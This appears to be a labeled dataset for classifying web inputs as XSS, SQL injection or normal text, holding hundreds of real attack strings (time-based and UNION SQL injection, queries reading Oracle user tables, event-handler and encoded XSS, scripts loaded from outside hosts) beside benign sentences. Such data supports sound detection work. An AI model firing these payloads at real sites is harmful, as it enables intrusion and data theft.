4816 = 4816 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14917 ">><marquee><img src=x onerror=confirm(1)></marquee> ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"" ></script><script>alert(1)</script>""><img/id=""confirm( 1)""/alt=""/""src=""/""onerror=eval(id&%23x29;>'""><img src=""http: //i.imgur.com/P8mL8.jpg"">",1,XSS,34 <listing onpointerup=alert(1)>XSS</listing>,1,XSS,7190 Select your result.,3,normal,24881 "or 1""=""1""#",2,SQLi,22412 Select a skin care routine to follow.,3,normal,24014 "1"" ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ""uzbl"" = ""uzbl",2,SQLi,12237 "ORDER BY 1,SLEEP(5),3,4--",2,SQLi,21028 "select * from users where id = 1 or @#""{ = 1 or 1 = 1 -- 1",2,SQLi,17347 "1 ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17349 <button onResume=javascript:alert(1)>,1,XSS,8752 "<style>:target {color: red;}</style><colgroup id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></colgroup>",1,XSS,747 "<base draggable=""true"" ondragenter=""alert(1)"">test</base>",1,XSS,4085 <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>,1,XSS,2879 -8187' ) ) ) or 1698 = 2823#,2,SQLi,20815 "-1830"" ) ) as bptv where 4805 = 4805 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --",2,SQLi,9957 ORDER BY 16#,2,SQLi,22310 "<body><a href=""#"" onclick=""makePopups()"">Spam</a>//[""'`-->]]>]</div>",1,XSS,2653 Let's discuss where to go for the weekend trip.,3,normal,23929 Where's the perfect place to enjoy nature?,3,normal,23809 Start the Spotify app and select a song to play.,3,normal,25527 Select carry.,3,normal,24756 "<applet ondblclick=""alert(1)"">test</applet>",1,XSS,7149 "<div draggable=""true"" contenteditable>drag me</div><picture ondrop=alert(1) contenteditable>drop here</picture>",1,XSS,959 "<xss oncut=alert(1) value=""XSS"" autofocus tabindex=1 style=display:block>test",1,XSS,2112 "<nav onkeydown=""alert(1)"" contenteditable>test</nav>",1,XSS,5110 "1%"" order by 1#",2,SQLi,22178 <title onpointerdown=alert(1)>XSS</title>,1,XSS,7634 "{""id"":null,""name"":""hang""}",3,normal,27018 Select your expression.,3,normal,24906 "At the bottom of the Settings window, select Update & Security.",3,normal,26346 What I am proposing is that the select minority of accurate OBE reports are simply cases of dream telepathy.,3,normal,25166 "1"" ) where 3445 = 3445 and elt ( 1212 = 1254,1254 ) --",2,SQLi,17987 "1%"" ) ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13559 "1"" ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ""imlx"" = ""imlx",2,SQLi,10984 ") or ('a'='a and hi"") or (""a""=""a",2,SQLi,20230 <dd onpointerleave=alert(1)>XSS</dd>,1,XSS,8850 "1' in boolean mode ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12935 Select your words.,3,normal,24813 Insert the data.,3,normal,22892 "1' union all select null,null,null#",2,SQLi,20106 "They no longer select the chairmen of parliamentary select committees, who are now elected by MPs.",3,normal,25312 "1"" ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ""mxnj"" like ""mxnj",2,SQLi,10415 "<iframe sandbox src=""//portswigger-labs.net""></iframe>",1,XSS,4642 <body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>,1,XSS,2401 "<XSS STYLE=""xss:expression(alert('XSS'))"">",1,XSS,7313 "1%' ) union all select null,null,null,null,null,null,null--",2,SQLi,17300 Let's choose a destination for our upcoming vacation.,3,normal,23855 "1'|| ( select 'bvic' from dual where 4839 = 4839 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) ) ||'",2,SQLi,12024 "1' ) as omtb where 1183 = 1183 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14048 Insert fresh batteries.,3,normal,22769 <script>alert(“XSS”)</script>,1,XSS,9600 Order a margherita slice.,3,normal,22739 <noembed onblur=alert(1) tabindex=1 id=x></noembed><input autofocus>,1,XSS,2627 1' ) where 1212 = 1212,2,SQLi,21410 "1' ) as nmzp where 3794 = 3794 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11364 "<command onkeypress=""alert(1)"" contenteditable>test</command>",1,XSS,3348 "1 ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( 6786 = 6786",2,SQLi,15859 select sleep ( 5 ) and ( ( 'srfc' like 'srfc,2,SQLi,19093 <button onFocusOut=javascript:alert(1)>,1,XSS,8300 [a](Javas%26%2399;ript:alert(1&#41;),1,XSS,8962 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( 6866 = 6866",2,SQLi,16484 1 and 7533 = 7533-- spzi,2,SQLi,21222 <noembed onpointerover=alert(1)>XSS</noembed>,1,XSS,6654 "<del onkeypress=""alert(1)"" contenteditable>test</del>",1,XSS,4949 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9#",2,SQLi,20011 "1"" where 4345 = 4345 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --",2,SQLi,10476 "UNION select table_schema,table_name FROM information_Schema.tables;#",2,SQLi,16242 1' ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 'ajka' = 'ajka,2,SQLi,9991 1' ) as njfg where 6392 = 6392 waitfor delay '0:0:5'--,2,SQLi,17999 -5039 union all select 2114#,2,SQLi,20832 "<img src=x onerror=""&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"">",1,XSS,95 "1' in boolean mode ) union all select null,null,null,null--",2,SQLi,17277 "<footer onmouseout=""alert(1)"">test</footer>",1,XSS,7174 "<;br size=\"";&;{alert(&#039;XSS&#039;)}\"";>;",1,XSS,6794 <button onDrop=javascript:alert(1)>,1,XSS,9142 "{""id"":null,""firstName"":""Wee"",""lastName"":""Ching"",""address"":""74989 Brandon St"",""city"":""15"",""telephone"":""4823489780""}",3,normal,27518 "1%' and make_set ( 8403 = 8403,8899 ) and '%' = '",2,SQLi,18577 Merge the puzzle pieces.,3,normal,22614 <form onpointerenter=alert(1)>XSS</form>,1,XSS,7847 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23",2,SQLi,16355 1' and 7533 = 7533 and 'frvk' = 'frvk,2,SQLi,19821 "&lt;FRAMESET&gt;&lt;FRAME SRC=\""javascript&#058;alert('XSS');\""&gt;&lt;/FRAMESET&gt;",1,XSS,1887 "{""id"":null,""firstName"":""Angeline"",""lastName"":""Tan"",""address"":""39 Stamford Rd #01-07"",""city"":""402"",""telephone"":""103057869""}",3,normal,27094 "1' ) where 9226 = 9226 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12810 "<xmp oncopy=""alert(1)"" contenteditable>test</xmp>",1,XSS,5775 "select * from users where id = 1 or ""$@"" or 1 = 1 -- 1",2,SQLi,17921 <meta onpointermove=alert(1)>XSS</meta>,1,XSS,8193 1' ) ) as zbkp where 1720 = 1720 and 4110 = 6748#,2,SQLi,18627 "<img src=""Mario Heiderich says that svg SHOULD not be executed trough image tags"" onerror=""javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');""></img>",1,XSS,4 1'|| ( select 'lxyu' from dual where 5789 = 5789 union all select null#,2,SQLi,16115 <canvas onblur=alert(1) tabindex=1 id=x></canvas><input autofocus>,1,XSS,2761 1'+ ( select 'feof' where 1966 = 1966,2,SQLi,19811 "1' where 4150 = 4150 and elt ( 8012 = 6026,6026 ) --",2,SQLi,18218 "1' ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'owot' = 'owot",2,SQLi,12246 "<rp onclick=""alert(1)"">test</rp>",1,XSS,9428 That's why I select places like Washington Heights and The Bronx.,3,normal,25493 "<tbody onmouseup=""alert(1)"">test</tbody>",1,XSS,7852 <html onblur=alert(1) tabindex=1 id=x></html><input autofocus>,1,XSS,3177 1%' ) ) and sleep ( 5 ) #,2,SQLi,21076 "select * from users where id = 1 or 1#"". union select 'a',version ( ) -- 1",2,SQLi,15693 "1 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,16328 <xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><input id=y autofocus>,1,XSS,2467 Sort the files.,3,normal,22859 "select * from generate_series ( 5980,5980,case when ( 5980 = 5063 ) then 1 else 0 end ) limit 1--",2,SQLi,14298 Select your evolve.,3,normal,25038 "1"" where 1683 = 1683 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,15636 "),NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,19335 "<figcaption onbeforepaste=""alert(1)"" contenteditable>test</figcaption>",1,XSS,2513 "-6595 ) ) ) union all select 2688,2688,2688,2688,2688,2688,2688,2688,2688,2688#",2,SQLi,15272 1 where 1576 = 1576,2,SQLi,21970 "1"" ) ) as drss where 2077 = 2077 and 7533 = 7533--",2,SQLi,18471 "<tbody draggable=""true"" ondragenter=""alert(1)"">test</tbody>",1,XSS,3623 <main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus>,1,XSS,2319 "<strong ondblclick=""alert(1)"">test</strong>",1,XSS,7089 "<header oncopy=""alert(1)"" contenteditable>test</header>",1,XSS,4479 1' ) ) as bswc where 1635 = 1635 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,10106 "<div draggable=""true"" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small>",1,XSS,1157 <col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus>,1,XSS,2488 Read on to find out how to select the right snowblower and how to get the best price on your investment.,3,normal,25759 "1 and elt ( 1210 = 1210,sleep ( 5 ) ) -- ommf",2,SQLi,19017 "<multicol onkeydown=""alert(1)"" contenteditable>test</multicol>",1,XSS,3229 "1%"" or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""%"" = """,2,SQLi,15039 AND 1 = utl_inaddr.get_host_address ( ( SELECT COUNT ( DISTINCT ( PASSWORD ) ) FROM SYS.USER$ ) ) AND 'i' = 'i,2,SQLi,13565 "<source onkeyup=""alert(1)"" contenteditable>test</source>",1,XSS,4394 1' ) as sjij where 8659 = 8659,2,SQLi,20629 "<area onclick=""alert(1)"">test</area>",1,XSS,8875 An attempt has been made to select an asymmetric unit using a rectangular subregion of the section.,3,normal,26377 <tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus>,1,XSS,2193 =1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'=',2,SQLi,9925 "<mark onmousedown=""alert(1)"">test</mark>",1,XSS,8004 1 ) ) as trin where 8843 = 8843,2,SQLi,20421 "<button onmouseenter=""alert(1)"">test</button>",1,XSS,6671 "1"" ) ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13382 "<del onmouseleave=""alert(1)"">test</del>",1,XSS,8166 "1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'medg' = 'medg",2,SQLi,17088 "1"" and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,12842 "<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('');"">",1,XSS,5911 "-2610%"" ) union all select 7779,7779,7779,7779,7779--",2,SQLi,18066 "{""id"":null,""firstName"":""Kirin"",""lastName"":""Swatan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27332 Select your barter.,3,normal,25055 """))))) waitfor delay '0:0:20' /*",2,SQLi,20241 "-3666"" ) ) ) union all select 4136,4136,4136--",2,SQLi,18927 <script /**/>/**/alert(1)/**/</script /**/,1,XSS,7323 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4--",2,SQLi,14166 1' ) ) as yyrx where 5600 = 5600,2,SQLi,20375 "`""'><img src=xxx:x \x09onerror=javascript:alert(1)>",1,XSS,5300 1'|| ( select 'ywjy' where 7579 = 7579,2,SQLi,19730 "<isindex oncut=""alert(1)"" contenteditable>test</isindex>",1,XSS,4242 Select quadruple-check.,3,normal,24575 1' ) ) as xcvg where 1157 = 1157 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,13958 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'pags' = 'pags,2,SQLi,16229 <input type=image src=1 onerror=alert(1)>,1,XSS,7615 "<div id=""129""><svg>",1,XSS,9772 Select a color palette for the artwork.,3,normal,24235 "-9557%"" ) ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( ""%"" = """,2,SQLi,10165 Where's the skate park?,3,normal,23610 <sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus>,1,XSS,2891 "Select the movie title as you would any app, and select from the options to purchase or rent the movie for different prices.",3,normal,25595 "<div draggable=""true"" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable>drop here</datalist>",1,XSS,790 position,3,normal,23229 -8234' ) ) ) or 9323 = 9323#,2,SQLi,20809 Join the fitness club for a healthier lifestyle.,3,normal,22933 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ""vabm"" = ""vabm",2,SQLi,13660 <animatetransform onpointerup=alert(1)>XSS</animatetransform>,1,XSS,3403 "1' ) ) union all select null,null,null,null,null,null#",2,SQLi,18005 "<keygen draggable=""true"" ondragstart=""alert(1)"">test</keygen>",1,XSS,3379 1 ) where 2940 = 2940,2,SQLi,21662 "<style>:target {transform: rotate(180deg);}</style><button id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></button>",1,XSS,585 -1549' ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( 'fnwx' = 'fnwx,2,SQLi,9996 -3688'|| ( select 'pber' from dual where 7137 = 7137 order by 1#,2,SQLi,16757 "1"" ) ) as dpln where 4193 = 4193 rlike sleep ( 5 ) --",2,SQLi,18133 "1 ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19098 1' ) ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( ( 'qrtf' = 'qrtf,2,SQLi,15221 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--",2,SQLi,13921 "Home Depot: Up to 50% off select patio furniture; Up to 40% off select kitchen and bath essentials, select semi-custom cabinets and select bath lighting; Up to 35% off select bath faucets and shower heads; Up to 30% off select storage solutions; Up to 203% off with appliance special buys.",3,normal,26093 &lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;,1,XSS,803 "1"" ) ) as cduw where 4495 = 4495",2,SQLi,20297 </script><script>alert(1)</script>,1,XSS,9176 "-1588%"" ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11674 select case when 7634 = 3954 then 1 else null end--,2,SQLi,18365 "<rtc onkeydown=""alert(1)"" contenteditable>test</rtc>",1,XSS,5175 "<marquee onmousemove=""alert(1)"">test</marquee>",1,XSS,6501 "1 and make_set ( 6911 = 1867,1867 )",2,SQLi,20099 "-3462 ) ) as biyl where 5143 = 5143 union all select 5143,5143,5143--",2,SQLi,16280 "-2548"" ) ) ) or 5107 = 8049--",2,SQLi,20692 "-7565' ) ) union all select 7745,7745,7745,7745,7745,7745#",2,SQLi,17376 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,12871 <meter onpointerover=alert(1)>XSS</meter>,1,XSS,7712 <textarea onauxclick=alert(1)>XSS</textarea>,1,XSS,6856 <footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus>,1,XSS,2758 "<address onmousemove=""alert(1)"">test</address>",1,XSS,6460 Select your accomplish.,3,normal,25010 "1' ) ) as mjps where 2179 = 2179 union all select null,null,null,null,null,null,null--",2,SQLi,14879 "1%"" ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( ""%"" = """,2,SQLi,12833 "1 ) as biup where 1414 = 1414 union all select null,null,null,null,null,null,null,null#",2,SQLi,14816 "-9098'|| ( select 'xodn' from dual where 8202 = 8202 union all select 8202,8202,8202,8202,8202,8202,8202--",2,SQLi,13830 "<menuitem onclick=""alert(1)"">test</menuitem>",1,XSS,6945 "First, keep in mind that there are other steps you can take before you even select a diaper rash ointment.",3,normal,26194 "<object classid=""clsid:..."" codebase=""javascript:document.vulnerable=true;"">",1,XSS,2172 "1%"" ) and 4595 = 4595#",2,SQLi,21537 "<svg onload=""javascript:alert(123)"" xmlns=""#""></svg>",1,XSS,5089 "1' ) ) as mxxd where 7255 = 7255 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12083 1 ) where 1402 = 1402,2,SQLi,21586 <button onOutOfSync=javascript:alert(1)>,1,XSS,8080 select case when 5346 = 8272 then 1 else null end--,2,SQLi,18344 "-7324 ) or make_set ( 8486 = 6544,6544 )",2,SQLi,19526 "<colgroup oncontextmenu=""alert(1)"">test</colgroup>",1,XSS,5617 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#",2,SQLi,13870 "1"" ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ""rwlq"" = ""rwlq",2,SQLi,10998 "{""id"":null,""name"":""Tangela""}",3,normal,26797 "select * from users where id = 1 +\+. union select null,@@VERSION -- 1",2,SQLi,16136 1 ) ) as rcbz where 4563 = 4563 and 2006 = 2006,2,SQLi,18856 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 'ojkd' = 'ojkd",2,SQLi,13468 "1 ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,13848 "1%"" ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ""%"" = """,2,SQLi,13400 1' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'pneh' like 'pneh,2,SQLi,10091 <script x>alert('XSS')<script y>,1,XSS,9484 "<Img src = x onerror = ""javascript: window.onerror = alert; throw XSS"">",1,XSS,2403 "<big onmouseenter=""alert(1)"">test</big>",1,XSS,8114 "1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'lwir' like 'lwir",2,SQLi,12421 "-9003"" ) ) union all select 9721,9721--",2,SQLi,19639 select ( case when ( 3365 = 6236 ) then 3365 else 1/ ( select 0 ) end ) --,2,SQLi,15726 "1%' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( '%' = '",2,SQLi,11163 &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;,1,XSS,1704 "1%"" ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19177 "<frameset oncontextmenu=""alert(1)"">test</frameset>",1,XSS,5643 ORDER BY 12--,2,SQLi,22235 "<style>:target {color:red;}</style><style id=x style=""transition:color 1s"" ontransitionend=alert(1)></style>",1,XSS,1126 "<dfn draggable=""true"" ondragleave=""alert(1)"">test</dfn>",1,XSS,4523 "1 ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15101 declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s),2,SQLi,14463 Just select the length (up to 99 measures) and play along to the internal metronome.,3,normal,25929 AND 1 = utl_inaddr.get_host_address ( ( SELECT COUNT ( DISTINCT ( column_name ) ) FROM sys.all_tab_columns ) ) AND 'i' = 'i,2,SQLi,13027 <blink onpointermove=alert(1)>XSS</blink>,1,XSS,7767 "1 union all select null,null,null#",2,SQLi,20142 <sCriPt/src=//14.rs?,1,XSS,9766 1) or pg_sleep(__TIME__)--,2,SQLi,20940 "<div id=""99"">XXX<style>",1,XSS,9738 "( select * from generate_series ( 3906,3906,case when ( 3906 = 3906 ) then 1 else 0 end ) limit 1 )",2,SQLi,14182 Choose fields where applicable.,3,normal,23298 "1"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""oxvs"" like ""oxvs",2,SQLi,11636 "<IMG SRC=x onmouseover=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3135 "<svg onbeforepaste=""alert(1)"" contenteditable>test</svg>",1,XSS,4266 "-9583' ) ) union all select 6392,6392,6392,6392,6392,6392,6392,6392,6392,6392#",2,SQLi,15353 <meta onpointerleave=alert(1)>XSS</meta>,1,XSS,7975 "<ol onbeforepaste=""alert(1)"" contenteditable>test</ol>",1,XSS,4679 or 1 in (select @@version)--,2,SQLi,20786 "1' ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )",2,SQLi,13344 "-2340%"" order by 1#",2,SQLi,22002 "-6388'+ ( select 'jqld' where 8600 = 8600 union all select 8600,8600#",2,SQLi,16270 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,11904 Create lasting memories.,3,normal,22775 `'><script>\x2Bjavascript:alert(1)</script>,1,XSS,7065 &lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;,1,XSS,4665 Where's the best spot to watch the 